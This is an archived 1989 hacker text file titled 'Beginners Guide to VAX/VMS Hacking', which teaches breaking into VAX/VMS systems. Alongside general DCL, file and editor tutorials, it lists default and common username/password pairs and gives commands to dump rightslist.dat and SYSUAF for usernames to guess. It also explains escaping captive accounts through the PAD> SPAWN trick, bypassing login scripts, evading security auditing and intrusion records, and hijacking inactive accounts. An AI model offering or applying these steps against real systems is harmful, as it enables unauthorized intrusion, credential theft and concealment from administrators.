💾 Archived View for gemini.spam.works › mirrors › textfiles › hacking › VMS › ccc-vms.txt captured on 2022-07-17 at 02:01:16.

View Raw

More Information

⬅️ Previous capture (2022-06-12)

-=-=-=-=-=-=-

+----------------------------------------------------------------------------+
!                     Beginners Guide to VAX/VMS Hacking                     !
!                                                                            !
!             File By ENTITY /  Corrupt Computing Canada  (c) 1989           !
!                                                                            !
!                                                                            !
!                          CORRUPT COMPUTING CANADA!                         !
!                                                                            !
!                CALL: (416)/398-3301  Login: Guest, PW: Guest               !
!                      (416)/756-4545  type !!    Login: lynx                !
!                                                                            !
+----------------------------------------------------------------------------+
!                                                                            !
! You may freely distribute this file as long as no modifications of any     !
! form are made to the file. All rights reserved by...What rights?!          !
!                                                                            !
!                                                                            !
+----------------------------------------------------------------------------+

September 12,1989


INTRODUCTION
------------


       Perhaps the most exciting Operating system to HACK on is VAX/VMS.
It offers many challenges for hackers and boasts one of the best security
systems ever developed.  In comparison to the security on UNIX, VMS is far
superior in every respect.  It can be very difficult to get inside such a
system and even harder to STAY inside, but isn't that what this is all about?!
I have written this file as a way for beginning hackers to learn about the VMS
operating system.  There is such a vast amount of information that can be
related about VAX/VMS hacking that it is not possible for me to cover
everything in just one file.  As such i will try and stick to the basics for
this file and hopefully write another file in the future that deals with
heavy-duty kernal programming, the various data structures, and system service
calls. All right so lets get at it!




GETTING IN
----------

       First of all how do you recognize a VAX when you see one?! Well the
thing that always gives a VAX away, is when you logon you will see:

Username:

It may also have some other info before it asks you for the username, usually
identifying the company and perhaps a message to the effect of:

Unauthorized Users will be prosecuted to the fullest extent of the law!

That should get you right in the mood for some serious hacking!  Ok so when you
have determined that the system you have logged into is indeed a VAX, you will
have to at this point enter your SYSTEM LOGIN.  Basically on VAX's there are
several default logins which will get you into the system. However on MOST
systems these default logins are changed by the system manager. In any case,
before you try any other logins, you should try these (since some system
managers are lazy and don't bother changing them):

Username           Password        Alternate
-------------------------------------------------------------------------------

SYSTEM             MANAGER         OPERATOR
FIELD              SERVICE         TEST
DEFAULT            DEFAULT         USER
SYSTEST            UETP            SYSTEST
DECNET             DECNET          NONPRIV


That's it. Those are the default system users/passwords.  The only ones on the
list that are GUARANTEED to be in the userlist are SYSTEM and DEFAULT. However,
I have never come across a system where these two haven't been changed from
their default passwords to something else.  In the above list, the alternate
password is simply a password many operators set the password to from the
deafult. So if the first password doesn't work, try the alternate password.  It
should be noted when the a user is added into the system, the default password
for the new user the SAME as his username.  You should keep this point in mind
because it is VERY important. Most of the accounts you hack out, will be found
in this way! Ok if above ones don't work,  then you should try these accounts.
These following accounts are NOT defaults, but through experience i have found
that many systems use these accounts or some variation thereof:

Username           Password
---------------------------
VAX                VAX
VMS                VMS
DCL                DCL
DEC                DEC       *
DEMO               DEMO      *
TEST               TEST      *
NETNONPRIV         NONPRIV   *
NETPRIV            PRIV
ORACLE             ORACLE    *
ALLIN1             ALLIN1    *
INGRES             INGRES    *
GUEST              GUEST     *
GAMES              GAMES
BACKUP             BACKUP    *
HOST               HOST
USER               USER      *
DIGITAL            DIGITAL
REMOTE             REMOTE    *
SAS                SAS
FAULT              FAULT
USERP              USERP
VISITOR            VISITOR
GEAC               GEAC
VLSI               VLSI
INFO               INFO      *
POSTMASTER         MAIL
NET                NET
LIBRARY            LIBRARY
OPERATOR           OPERATOR  *
OPER               OPER

The ones that have asterisks (*) beside them are the more popular ones and you
have a better chance with them, so you should try them first. It should be
noted that the VAX will not give you any indication of whether the username
you typed in is indeed valid or not.  Even if you type in a username that does
not exist on the system, it will still ask you for a password.  Keep this in
mind because if you are not sure if whether an account exists or not, don't
waste your time in trying to hack out its password. You could be going on a
wild goose chase!  You should also keep in mind that ALL bad login attempts are
kept track of and when the person logs in, he is informed of how many failed
attempts there were on his account.  If he sees 400 login failures, I am sure
that he will know someone is trying to hack his account.




THE BASICS
----------

Ok i am assuming you tried all the above defaults and managed to get yourself
into the system. Now the real FUN begins!  Ok first things first. After you log
in you will get some message about the last time you logged in etc. If this is
the first time you have logged into this system then you should note the last
login date and time and WRITE IT DOWN! This is important for several reasons.
The main one being that you want to find out if the account you have just
hacked is an ACTIVE or INACTIVE account.  The best accounts are the inactive
ones. Why?! Well the inactive accounts are those that people are not using
currently, meaning that there is a better chance of you holding onto that
account and not being discovered by the system operator.  If the account has
not been logged into for the last month or so, theres a good chance that it
is inactive.  Ok anyhow once your in, if you have a normal account with access
to DCL you will get a prompt that looks like:

$

This may vary from machine to machine but its usually the same. If you have a
weird prompt and would like a normal one, type:

$set prompt=$

If this is the first time you have hacked into this system there are a couple
of steps you should take immediately. First type:

$set control=(y,t)

This will enable your break keys (like ctrl-c) so that you can stop a file or
command if you make a mistake.  Usually ctrl-c is active, but this command will
insure that it is. (Note: in general to abort a command, or program you can
type ctrl-c or ctrl-y) Ok anyhow, the next step is to open the buffer in your
terminal then type:

$type sys$system:rightslist.dat

This will dump a file that has all the systems users listed in it.  You may
notice a lot of weird garbage characters. Don't worry about those, that is
normal.  Ok after this file ends and you get the shell prompt again ($) then
save the buffer, clear it out and leave it open. Then type:

$show logical

Ok after this file is buffered save it also.  Ok at this point you have two
files on your disk which will help you hack out MORE accounts on the system.
For now, lets find out how powerful the account you currently hacked into is.
You should type:

$set proc/priv=all

This may give you a message telling you that all your privileges were not
granted. That's ok. Now type:

$show proc/priv

This will give you a list of all the privileges your account is set up for.
Usually most user accounts only have NETMBX and TMPMBX privs.  If you have
more than these two, then it could mean that you have a nice high-level user.
Unlike UNIX which only has a distinction between user and superuser, VMS has
a whole shitload of different privileges you can gain.  The basic privs are as
follows:

PRIVILEGE      DESCRIPTION
------------------------------------------------------------------------------
NONE           no privilege at all


NORMAL PRIVS
------------
MOUNT          Execute mount volume QIO
NETMBX         Create network connections (you need this to call out!)
TMPMBX         Create temporary mailbox


GROUP PRIVS
-----------
GROUP          Control processes in the same group
GRPPRV         Group access through SYSTEM protection field


DEVOUR PRIVS
------------
ACNT           Disable accounting
ALLSPOOL       Allocate spooled devices
BUGCHK         Make bugcheck error log entries
EXQUOTA        Exceed disk quotas
GRPNAM         Insert group logical names n the name table
PRMCEB         Create/delete permanent common event flag clusters
PRMGBL         Create permanent global sections
PRMMBX         Create permanent mailboxes
SHMEM          Create/delete structures in shared memory


SYSTEM PRIVS
------------
ALTPRI         Set base priority higher that allotment
OPER           Perform operator functions
PSWAPM         Change process swap mode
WORLD          Control any process
SECURITY       Perform security related functions
SHARE          Access devices allocated to other users
SYSLCK         Lock system-wide resources


FILES PRIVS
-----------
DIAGNOSE       Diagnose devices
SYSGBL         Create system wide global sections
VOLPRO         Override volume protection


ALL PRIVS
---------
BYPASS         Disregard protection
CMEXEC         Change to executive mode
CMKRNL         Change to kernal mode
DETACH         Create detached processes of arbitrary UIC
LOG_IO         Issue logical I/O requests
PFNMAP         Map to specific physical pages
PHY_IO         Issue physical I/O requests
READALL        Possess read access to everything
SETPRV         ***  ENABLE ALL PRIVILEGES!!! ***
SYSNAM         Insert system logical names in the name table
SYSPRV         Access objects through SYSTEM protection field


Ok that's the lot of them! I will explain some of the more important privileges
later in the file.  For now, at least you can see just how powerful the account
is.  It should be noted that most accounts usually are only granted the TMPMBX
and NETMBX privileges, so if you don't have the others, don't fret too much.



GENERAL TERMINOLOGY
-------------------

    I think that i should clarify some of the basic concepts involved with
VAX/VMS operating systems before we go any further:

PROCESS: this is what is created when you log in.  The system sets aside CPU
         time and memory for you and calls it a process. Any task that is run
         in VMS is called a process.

SUBPROCESS: also known as child-process, this is just a process that was
            created by another process.

DCL    : Digital Command Language. This is the shell ($) that you are put into
         when you log into a VAX

MCR    : an alternate shell that is used (rarely) on certain accounts. Login
         prompt is a  >  as opposed to DCL which gives a  $
SHELL  : this is the '


 that you see once you are logged in. This is your
         interface with the system, where you can enter the various commands
         execute files and perform other activities.

JOB    : a process and a group of its subprocesses performing some task

SPAWN  : this is the actual command that allows you to create subprocesses
         'SPAWNING' is the act of creating subprocesses

PID    : process identification number. This is an 8 byte ID code that is
         uniquely given to each process that is created on the system.

IMAGE  : this is an EXE file that you can execute (ie run)

UIC    : User identification code. This is in two parts, namely: [group,member]
         The way this works is that users in the same group can access each
         others files through the group protection code.  However since the UIC
         MUST uniquely identify each user, the member portion separates the
         individuals in each group.  If an account does not have a different
         member number, he will NOT be put in the RIGHTSLIST database.



CONTROL KEYS
------------

 A brief note on control sequences.  Several different actions can be activated
via control sequences. They are:

CTRL-H  :delete last character
CTRL-B  :redisplay last command (can go back up to the last 20 commands issued)
CTRL-S  :pause display
CTRL-Q  :continue after pause
CTRL-Z  :*EXIT* use to break out of things such as CREATE and EDIT
CTRL-C  :*CANCEL* will exit out of most operations
CTRL-Y  :*INTERRUPT* will break out of whatever you are doing
CTRL-T  :print out statistical info about the process

NOTE: sometimes upon login, the CTRL-Y, CTRL-C keys are disabled.  To ensure
      these are enabled, issue this command upon login:

$ SET CONTROL


-------------------------------------------------------------------------------
NOTE: all the commands that are executed from DCL can be referenced from an
      online help manual.  To access this, simply type help at any '


 prompt
      This help is also available within the various utilities and programs
      such as authorize and mail. The two MOST important commands are SET and
      SHOW. These should be buffered and printed out for your own reference.
-------------------------------------------------------------------------------

FILES and DIRECTORIES
---------------------

 The directory structure of VMS is a heirarchical one similar to MS-DOS and
UNIX. Its a simple concept, and i will only briefly skim over it.  First of all
it should be noted that there may be more than one hard drive or other
mass-storage device hooked up to your system. Within each hard drive there is
the ROOT directory. This is the highest directory in the tree and is referenced
by [000000]. (this will be explained in a minute)  Within the root there are
several subdirectories. Within these subdirectories there may be files and even
further subdirectories.  The concept is quite simple, but can be difficult to
explain.  Here is a diagram to give you a rough idea of how it is set up:



                                 [000000] <--root directory
                                     !
                                     !
          +--------------------------+---------------------------------+
          !                          !                                 !
          !                          !                                 !
        [d1]                       [d2]                              [d3]
          !                          !                                 !
    +-----+--------+           +-----+-----+                  +--------+
    !     !        !           !           !                  !        !
    !     !        !           !           !              [d3.d3a]  [d3.d3b]
 [d1.da] [d1.db] [d1.dc]    [d2.d2a]   [d2.d2b]
            !                  !           !
            !                  !        +--+-----------+
       [d1.db.db1]        [d2.d2a.d2a1] !              !
                                       [d2.d2b.d2b1] [d2.d2b.d2b2]




    Hopefully this will give you some sort of an idea of how the directories
can be structured. Within each subdirectory there may be other files also. For
example to see the directory after you log in you would type:

$dir

a sample result may be:


Directory DISK$SCHOOL:[REPORTS.JOHN]

average.com;3
generate.exe;1
mail.mai;10
marks.dat;4
marks.dat;5
reportcard.dir
projects.dir

Total 7 files.

What does this tell you? The first line tells you what drive and subdirectory
you are in. The next lines are the actual files. As you can see each file has
a 3 character extension, followed by a comma and a number.  The name before the
period is the actual filename (eg. average) the 3 characters after the period
is known as the extension (eg.com) and the number after the comma refers to the
version of the file. So in this case, this is version number 3.  Any time you
modify or save a file, it automatically assigns it a version number of 1. If
file already exists on your disk, it increments the version number by 1 and
then saves it as such.  So the next time i go ahead and save the file
average.com, it would add another file to the list called average.com;4
  Special note should be taken of the files that have an extension of '.DIR'
These are not really files, but rather subdirectories.  I will show you how to
switch subdirectories in just a minute. First you should take note of the
different file extensions.  Although you can name the files anything you want
some of the more important extensions are:

TYPE      DESCRIPTION
-------------------------------------------------------------------------------
EXE       Executable IMAGE. These files are programs that can be RUN
COM       DCL SCRIPT files. These can also be executed, utilizing the @ command
DAT       DATA file. Sometimes useful things to look at.
LIS       Listing File, many times important info is in here
MAI       Mail file,  use the MAIL command to read these
DIR       DIRECTORY - not a file
JOU       Journal File, often created thru the use of other programs eg EDIT
TXT       Text Files, often hold useful information.

These are just some of the extensions you are most likely to see. The two
important ones are the EXE and COM files. These can be executed from the DCL
level. EXE files are executed via the RUN command. Eg. to run authorize.exe:

$run authorize

This will run the authorize IMAGE. Supposing there were more than one version
of authorize you could specify a version number. eg.

$run authorize.exe;4

The other type of file you can run is the COM files. These are like SCRIPT
files in UNIX or .BAT files from MS-DOS.  They are just a sequence of DCL
commands strung together that are executed when you initiate the file. To run
COM files, use the @ command. For example to run adduser.com, type:

$@adduser

The version number thing i stated for EXE files also applies for COM files.



$sd [000000]
$dir [...]*.*

Similarly you type dir [...]*.com, if you wanted just the COM files listed.
To see the contents of a file, you can use the TYPE command. For example:

$type login.com

this might type out something like:

$ sd:==set default
$ set control=(y,t)
$ set proc/name=entity
$ set term/dev=vt100
         :
         :
         :
        etc

This is great for COM files, DAT files and some of the other types, but you
will always get garbage when you type EXE files so don't bother trying those.
This is very useful for snooping around other peoples files and getting
information. Many times i have found user/passwords lying around in TXT or
LIS files left by some careless user.

 Now, how do you go about changing directories? Well, first you should set up
a shortcut.  The normal command to change directories is SET DEFAULT. For
example to change to a subdirectory called REPORTS, you would have to type:

$set default [.reports]

To make life simpler on yourself, as soon as you log in, you should type:

$sd:==set default

This defines a macro called SD that is interpreted by DCL as SET DEFAULT. You
can similarly define other 'favorite' commands to some short, easy to remember
definition.  Anyhow heres the syntax for changing directories:

SD DEVICE:[dir1.dir2.dir3....]

The device can be optionally left out, if you plan to remain in the same hard
drive. You have to then enter a '[' followed by the root directory, followed
by a period, followed by another subdirectory name etc. Eg.

$sd dub0:[cosy.users]

Suppose at this point, you were in directory cosy, subdirectory users and there
was a further subdirectory called 'info.dir'.  Rather than specify the full
pathname, you can simply type:

$sd [.info]

This will advance you one level into the info subdirectory. Remember to put the
period in front of the subdirectory. If you don't, in this case it would assume
that you were trying to reference the root directory called info.  Another
important thing to note is moving back levels in terms of subdirectories. For
example if you were in [cosy.users.info] and wanted to move back to
[cosy.users] you could type:

$sd [-]

Similarly you can put in as many hyphens (-) as you want to move back. For
example  sd [--]  would put you back to the cosy directory.

Another important thing to note about subdirectories are logical assigned
symbols. These are names assigned to certain things. For example the main
system directory is called sys$system. So to go to it you could type:

$sd sys$system

This would throw you into the system directory. Similarly you can type:

$sd sys$login

and this will put you back into the directory that you were initially in, when
you first logged in.  These symbols stand for actual device:directory
combinations.  To see the various definitions that are assigned to each process
you should type:

$show logical

This will list a whole bunch of global system equates that you can use to
access various parts of the VAX structure.  In addition to view all of your
locally defined symbols, use:

$show symbol *



FILE PROTECTION
---------------

Ok before i begin this, let me just state that whatever i say about files also
applies to directories.  There are four types of file protections. There is
SYSTEM,WORLD,GROUP and OWNER. These are briefly:

SYSTEM- All users who have group numbers 0-8 and users with physical or logical
        I/O privileges  (generally system managers, system programmers, and
        operators)
OWNER - the owner of the file (or subdirectory), isolated via their User
        Identification Code (UIC). This means the person who created the file!
GROUP - All users who have the same group number in their UICs as the owner of
        the file.
WORLD - All users who do not fall in the categories above

Each file has four types of protection within each of the above categories.
They are: Read, Write, Execute, Delete. Explanations are:

READ   - You can read the file and copy it.
WRITE  - You can modify and rename that file.
EXECUTE- You can run the file
DELETE - You can delete the file

When you create a file the default is that you have all the privileges for that
particular file. Group, world and system may only have limited privileges. This
can be changed with the set protection DCL command. For example:

$set protection=(group:rwed,world:r)/default

would set your default protection to allow other users in your group to have
full read,write,execute,delete privs to the file, and others only read access
to the file. The /default means that from now on all the files you create will
be set with this particular protection.  To change one of your own files to
some other protection you can alternatively use:

$set prot topsecret.dat /prot=(system:rwed,group:rwed,world:rwed,owner:rwed)

This would enable all users on the system to access the file 'topsecret.dat'
When specifying the protection, you do not have to list them for each of the
four groups.  You can simply choose only those that you want changed from your
default.



EDITING FILES
-------------

  An important utility that all VAX hackers should be familiar with is the EDT
text editor. To call it up, use the EDIT DCL command. ie:

$edit [filename]

This will invoke the EDIT/EDT text editor.  The [filename] refers to the file
that you want to edit.  If the file does not exist, it is created at this point.
The EDT editor does not provide a default file type when creating files, so if
you do not specify one, it will leave it as NULL.  It should be noted that there
is more than just the EDT editor, but when you type in EDIT, the default is
/EDT.  Basically it is an editor that you can use to create/modify COM or any
other type of text files.

 After the editor is invoked, it keeps track of everything that you enter in a
JOU file.  In case of lost carrier or some other accident, you can recover what
you had by specifying the /RECOVER qualifier. For example:

$edit/recover memo.dat

This would take the last copy of memo.dat, load it into memory, then process
your last JOU file, updating it to virtually exactly where you were before you
got cut off.  Journaling is automatically defaulted to ON, but can be turned
off with the /NOJOURNAL qualifier.  For a description of what all the qualifiers
are, and what they do, refer to the online HELP manual.

 Ok here is a list of the basic commands you can perform in the EDT editor:


--------------------------------------------------------------------------------

X   (where X = line number)............show line X only
X:Y (where X,Y = line numbers).........show line X through line Y
A,B,C,D (a,b,c,d = line numbers).......list lines A,B,C,D
X:e ...................................list from X to end
T W ...................................TYPE WHOLE. List ALL of the text lines
S/string1/string2/W....................substitute ALL occurrences of string1
                                       for string2 as they occur from current
                                       line number downwards
"string" ..............................search for first occurrence of string
                                       from current line downwards
T A "string" ..........................type all occurrences of string from
                                       current line downwards
X:Y a "string" ........................search for occurrences of string within
                                       range denoted by X through Y
D X ...................................Delete line X
D X:Y .................................Delete line X through Y, inclusively
I .....................................insert a line
I X ...................................insert from line X
M X:Y to Z ............................move lines X through Y to line Z
RES ...................................resequence line numbers
RES/SEQ:X:10 ..........................resequence from line X in intervals of 10
R X ...................................replace from line X. This deletes the
                                       current line and automatically goes into
                                       insertion mode.
EXIT ..................................leave the editor, and SAVE the current
                                       text.
QUIT ..................................leave the editor and DO NOT SAVE the
                                       current text.

--------------------------------------------------------------------------------

A sample editing session is shown:

$edit lame.txt



     hi this is just some bullshit text to test out how this EDIT program
     works.  Oh well, easy enough.  bye!

     <hit ctrl-z>



$type lame.txt

 hi this is just some bullshit text to test out how this EDIT program
 works.  Oh well, easy enough.  bye!

$del lame.txt;*

COMMANDS
--------

In this section i will outline some of the more important commands that you can
issue from the DCL level. This is not meant to be a complete guide. I will
merely point out some of the more important commands and a very brief
description. Proper help can be obtained from the online HELP facility.


NOTE: It should be noted that each of the following commands may have further
----- qualifiers that you can specify. You should check up on these from the
      online help also.


@               -Lets you execute COM script files
ACCOUNTING      -allows you to view and edit system accounting data that keeps
                 track of what system time you have racked up.
ANALYZE         -lets you view the contents of OBJ files in HEX/ASCII format.
ANALYZE/SYSTEM  -Invokes the SDA. VERY VERY USEFUL!! Allows you to view other
                 running processes, their type-ahead buffers etc.
APPEND          -appends the contents of file1 to file2
ATTACH          -allows you to attach yourself to one of your subprocesses
CLOSE           -closes a file that was opened for input/output via OPEN
CONTINUE        -continue a process that you have aborted with control-y
COPY            -copy file1 to file2. You can specify full pathnames, with
                 device and subdirectory. If you want to copy it to your home
                 directory just use sys$login as your 'TO' file.
CREATE          -create a text file of any type. Eg. you want to create a
                 simple COM file or perhaps a letter to another hacker on the
                 system. (you shouldn't be using MAIL to send messages!)
CREATE/DIR      -If you want to create a subdirectory
DELETE          -delete a filename. Remember to specify a version number when
                 you are deleting a file or it wont work.eg. del garbage.com;1
DELETE/INTRUSION_RECORD -gets rid of the failed password attempts
DIFFERENCES     -compares two files and notifies you of their differences
DIRECTORY       -get a directory of the files. Various qualifiers can be chosen
DUMP            -get a hex/ascii file dump
EDIT/EDT        -invokes the VAX EDT interactive text editor
EXAMINE         -view the contents of virtual memory
HELP            -ONLINE HELP MANUAL. REFER TO IT OFTEN!
LINK            -link object files into EXE files that you can run
LOGOUT          -the proper way to terminate a session
PHONE           -Allows you to chat with another user on the system. It is not
                 recommended that you use this, except with fellow hackers.
RENAME          -rename a file or directory
RUN             -lets you execute EXE files
SET CONTROL     -disables/enables interrupts via ctrl-y/ctrl-c
SET DEFAULT     -change directories
SET HOST        -allows you to connect to another mainframe
SET PASSWORD    -change the password of your account
SET PROCESS     -change the characteristics of your process
SET PROMPT      -change the prompt ($)
SET TERMINAL    -change your terminal characteristics
SHOW ACCOUNTING -show the current security/accounting enabled
SHOW AUDIT      -show SECURITY enabled
SHOW DEFAULT    -see your current directory. (Like PWD in UNIX)
SHOW DEVICES    -check out the system setup
SHOW INTRUSION  -view the contents of the breakin database
SHOW LOGICAL    -current logical name assignments
SHOW NETWORK    -lists all the available nodes that you can connect to
SHOW PROCESS    -View your process settings
SHOW PROTECTION -show the default protection you have set
SHOW SYSTEM     -useful to see the running processes
SHOW TERMINAL   -display your terminal characteristics
SHOW USERS      -see who else is logged in.
SPAWN           -spawn a subprocess
STOP            -kill off a subprocess
TYPE            -view a file


  This should give you a general overview of some of the more important
commands that you can use.  It would be impossible for me to list ALL the
commands, and their descriptions, so i suggest that you go through the online
HELP facility and familiarize yourself with the syntax of some these commands.


HACKING
-------

Up to this point i have mainly discussed the basic concepts involved with VMS.
By now you should be familiar and comfortable with the various DCL commands
and how to accomplish certain tasks.  If you are still sketchy, go back and
re-read the sections you don't understand.  You may also want to log into a VAX
and just try fiddling around in the shell getting used to how the whole thing
works.

 In this section i will discuss some of the techniques that you may find useful
in hacking out accounts, calling out to remote systems, and gaining access to
confidential information.


 Lets start from the top: When you first login to the system, after it accepts
your password etc, it executes the SYLOGIN.COM file.  Then it searches your
default directory for the file LOGIN.COM (this may be changed by the system
manager if he wishes)  This file basically sets up your terminal parameters and
perhaps some macros that you wish to be defined. It may or may not also execute
some utility.


BYPASSING LOGIN.COM
-------------------

 Sometimes it may be useful to be able to skip the login procedures. For
example if the system automatically runs some file as soon as you log in, and
doesn't put you into the shell, this technique can be used:

Username: entity/nocomm

Assuming the user was named entity, if you put a /nocomm qualifier, it will
skip the login.com file and put you directly into DCL. Similarly you can
specify some other file you want executed instead of login.com. eg.

Username: entity/comm=custom.com

This will execute the custom.com file upon entry into the account.  It should
be noted that these methods WILL NOT WORK on a CAPTIVE account. What is a
captive account?! Read on...


CAPTIVE ACCOUNTS
----------------

 Many times, in an attempt to make an account more secure the system manager
sets the captive flag to ON, in the users profile.  What this means is that
when you log in, you cannot break out of the login file into the DCL shell.
This means that although you can hit ctrl-y and it may even say *interrupt*
it will not actually abort the file.  So how do you exit to DCL?! Well there
are a few ways. Usually accounts set up in this manner are used to allow the
user to connect to other nodes.  If this is the type of account that you have
logged into then try the following:  First choose an option from the menu that
they present that allows you to call any node.  When it says something like
%connected to...  then hit two ctrl-y in quick succession.  It will then ask
you if you want to really abort the current session. Type Y and it will put you
at a prompt that looks like:

PAD>

At this point you should type in SPAWN and it will spawn a process and throw
you into the DCL Shell.  This is a major security flaw in VMS and can be put to
good use on many a system.


GAINING PRIVILEGES
------------------

On most systems that you hack into, you will find yourself with only TMPMBX and
NETMBX privileges. To see your privs type:

$show proc/priv

These however may not be all the privileges that you have assigned. Upon login,
the system only assigns you your default privileges. On some accounts you may
have more than just these privileges. To see if you do, type:

$set proc/priv=all

if this doesn't give you any error message then you have found yourself a
SYSTEM account! With this account you can create new users, change the security
setup read other peoples files etc.  Here are a list of some of the more
important privileges and what they can be used for:

CMKRNL    -change to kernal mode. Very Powerful privilege!!
SETPRV    -allows you to become a Super-User. You can do whatever you want!
READALL   -allows you to read other peoples files and directories regardless
           of the protection
OPER      -allows you to perform many useful operator functions (security etc)
SYSPRV    -You can gain the same UIC as the system and access just about
           anything you want. Create/modify accounts
NETMBX    -allows you to call out on the network to other systems
BYPASS    -this allows you to view network passwords, and to bypass all types
           of protection fields

These are just some of the more important ones to the hacker.  For a complete
list of all the privileges and what each one does, see the list i presented
earlier in the file.

One important note: It is not possible to gain privileges that are not set up
in your default from the DCL level.  There is one way to gain ALL privileges on
ANY Vax but it involves some serious kernal programming.  I could outline the
program here but i chose not to.  The reason for this is that many people would
abuse the system if they had access to wiping out hard drives and totally
trashing the system.  If you work from the ground up, you begin to realize just
how important gaining extra access is. You begin to respect the VMS system for
what it is.  A system account in the hands of novice is a very dangerous thing
indeed, and my suggestion is that if you have a SYSTEM account that has more
than just the default privileges that you should disable them.  This will only
help you from making any mistakes and screwing up the system.  To do this type:

$set proc/priv=noall
$set proc/priv=(tmpmbx,netmbx,readall)

With these privileges you should be able to easily navigate throughout the
system without messing anything up.  Keep one thing in mind, don't delete files
unless you have created them! People will notice things like this and you are
guaranteed to lose your account.

 Once you are an experienced hacker you may wish to create a program that gives
you more privileges.  To get you started in this direction i will give you
an excerpt out of the 'VAX/VMS internals and data structures' manual:


If a process wishes a privilege that is not in its authorized list, one of two
conditions must hold or the requested privilege is not granted.

1)The process must have SETPRV privilege.  A process with this privilege can
  acquire any other privilege with either the set privilege system service or
  DCL command SET PROCESS/PRIVILEGES.

2)The system service was called from executive or kernal mode. This mechanism
  is an escape that allows either VMS or user-written system services to
  acquire whatever privileges they need without regard for whether the calling
  process has SETPRV privilege.  Such procedures must disable privileges
  granted in this fashion as part of their return path.


That should give you an idea of what is necessary to go about writing a program
that grants you extra privileges.  For those advanced programmers, here is the
relevant information:



Symbolic name   Location           Usage                          Referenced By
---------------+------------------+------------------------------+-------------
PHD$Q_PRIVMSK  !process header    !working privilege mask        !system srvc's
PCB$Q_PRIV     !PCB               !same as phd$q_privmsk         !device driver
CTL$GQ_PROCPRIV!P1 Pointer page   !permanently enabled privs     !SET UIC
PHD$Q_AUTHPRIV !process header    !procs allowable privs         !$setprv
PHD$Q_IMAGPRIV !process header    !mask for enhanced priv images !$setprv
UAF$Q_PRIV     !sysuaf.dat        !UAF allowable privs           !LOGINOUT
KFI$Q_PROCPRIV !priv install image!image installed with privs    !image actvatr
IHD$Q_PRIVREQS !image header      !unused - set for all privs!   !image actvatr
---------------+------------------+------------------------------+-------------



ONLINE SECURITY
---------------

Version 4.2 of VMS introduced the security auditing features.  These features
can be used to track down hackers and illegal use of the machine. Things such
as access to files, login failures, process creation, adding users etc can all
be monitored and logged.  After you have logged into an unknown system, it is
wise to check what kind of security they have enabled on the system. This is
done in two ways. First you should try:

$show accounting

Normally this will either say accounting is disabled or will have a list of
items that are being monitored.  This is used mainly for charging the users for
CPU time etc.  What you should check for in this list is if IMAGE accounting
is enabled.  If it isn't, then you can relax. If it is, you know that you have
a smart system manager here and you will have to take extra precautions when
fiddling around on this machine.  The second thing you should check is the
actual level of security enabled.  Generally this feature is disabled, and you
have nothing to worry about. To see the security type:

$show audit

One thing to note is that you must have the SECURITY privilege to issue this
command. An especially secure system may have things such as breakins, logins,
logfailures, file access (both successes and failures),and authorization
checks.  These systems require a tremendous amount of care, and are not a good
place to start learning about VMS.

Another important thing that you should keep in mind is that VAX/VMS stores
information about login failures (invalid password, account expired, unknown
username).  A security manager can identify possible breakin attempts by using:

$show intrusion/type=intruder

This command requires the CMKRNL and SECURITY privileges.  An interesting thing
to note is that the system manager can have the VAX do certain things after it
has determined that the user trying to log in is not legitimate.  For example
it can block all login attempts from a certain terminal, or it could turn off
accepting passwords for a certain account for a specified period of time. So
lets suppose you were hacking an account and after 10 tries actually entered
the right password.  If the intrusion alert is set at 5 tries, then even if you
enter the correct password, it wont let you in!!


EXPIRED PASSWORDS
-----------------

I want to make a quick note here about expired passwords.  Often you will find
after logging into an account that it will say that your password has expired
and for you to enter a new password.  At this point you should check when was
the last date of access. If it was only a few days ago, then you should forget
about this account.  If it more than a few weeks ago, then you have found your-
self an INACTIVE account (ie one that is not in use anymore)  The first thing
that you should do is set a new password. For example:

$set password

Passwords can be from 1-31 characters in length and can contain the following
characters:

A-Z
a-z
0-9
$ (dollar sign)
_ (underscore)

Note that uppercase, and lowercase are not differentiated (unlike UNIX).  The
reason that you should enter a password at this point is that if you don't, the
next time the account will not let you log in since the password has expired.




GAINING MORE ACCOUNTS
---------------------

Once you have managed to hack onto a VAX, often you will want to gain more
accounts on the system.  There are several ways to go about doing this.  The
first way is to get a list of all the users on the system.  Remember that the
default password for any account is the same as the username. Well if you have
a list of users, theres a good chance you may find a few who haven't bothered
to change their passwords.  There are a few methods of viewing the userlist.
The simplest, but least readable way is to:

$type sys$system:rightslist.dat

and buffer the incoming information. You will notice some garbage characters
also sent through.  The way this file is set up is a 1-2 byte character ID
followed immediately by a 32 byte string with the username.  So to pick out the
usernames, simply ignore the first character from each name, and then you have
the usernames. There is one small problem to this. Sometimes the character ID
in front of the name is a SPACE.  In this case, you would still skip the first
character (which is a space), but in viewing the name you would take all the
characters.  So you just have to use your judgement when looking at this list
to determine whether the string is the whole name, or whether it has an ID
code stuck in the beginning. The problem is that the ID code is not necessarily
a garbage character, it could be any valid ascii character (spaces,letters,
numbers etc)  The thing that you should keep in mind is that these ID codes are
grouped together, so you may see several names that all start with 'A' and you
can assume that this is the ID and not part of the actual name.
  Another method which is a bit slower, but a lot neater is to use the DUMP
command on the rightslist file:

$dump sys$system:rightslist.dat

This is quite useful, because it automatically strips away control characters,
and puts each name into a separate record which makes it easy to isolate the
proper login names.

  An alternative method is to run the psi$authorize file from the system dir.
To do this, type:

$mc psiauthorize

When you get the PSI-authorize prompt, type:

PSI-authorize> show /id *

This will list all the users on the system. The drawback to this method is that
the system that you are on, may have taken out the PSI utilities from the
system directory.  The PSI utilities are used mainly for remotely connecting
to other mainframes.
 A third method to get a listing of all the users is to go through the sysuaf
database.  On most accounts this is usually not possible , since most users do
NOT have read/write access to sysuaf.dat.  If you DO have access to this file
(ie you have readall or setprv etc) then you can run authorize:

$sd sys$system
$run authorize

Then when you get the UAF prompt, type:

UAF>show [*,*] /brief

 The added bonus of doing it this way is that you can also find out things such
as the users home directory, when was the last time they logged in, what their
privileges are etc.  Easy to isolate the good accounts on the system that you
may want to hack at. It should be noted however, that if you CAN perform this
command, then you also have the priv's to create your own user, or better yet
change the password on an inactive account.
 There is another possibility that sometimes works on many systems.  Often, the
system manager uses the LIST command from AUTHORIZE and what it does is produce
a user listing in the file called: SYSUAF.LIS in the SYS$SYSTEM directory. If
he has done this, unless he explicitly changes the protection on the file, this
file has WORLD READ access.  In other words, anyone can go in and type out the
file. To do this try:

$type sys$system:sysuaf.lis

   Ok so lets assume that you have used one of these methods and have come up
with a list of all the users on the system. Now comes the tedious part. What
you have to do is log back into the system, and try each of the names out. For
the password, enter the same thing as you did for the username.  This is a long
and boring process depending on how large the userbase is, but it usually
yields a few good accounts.

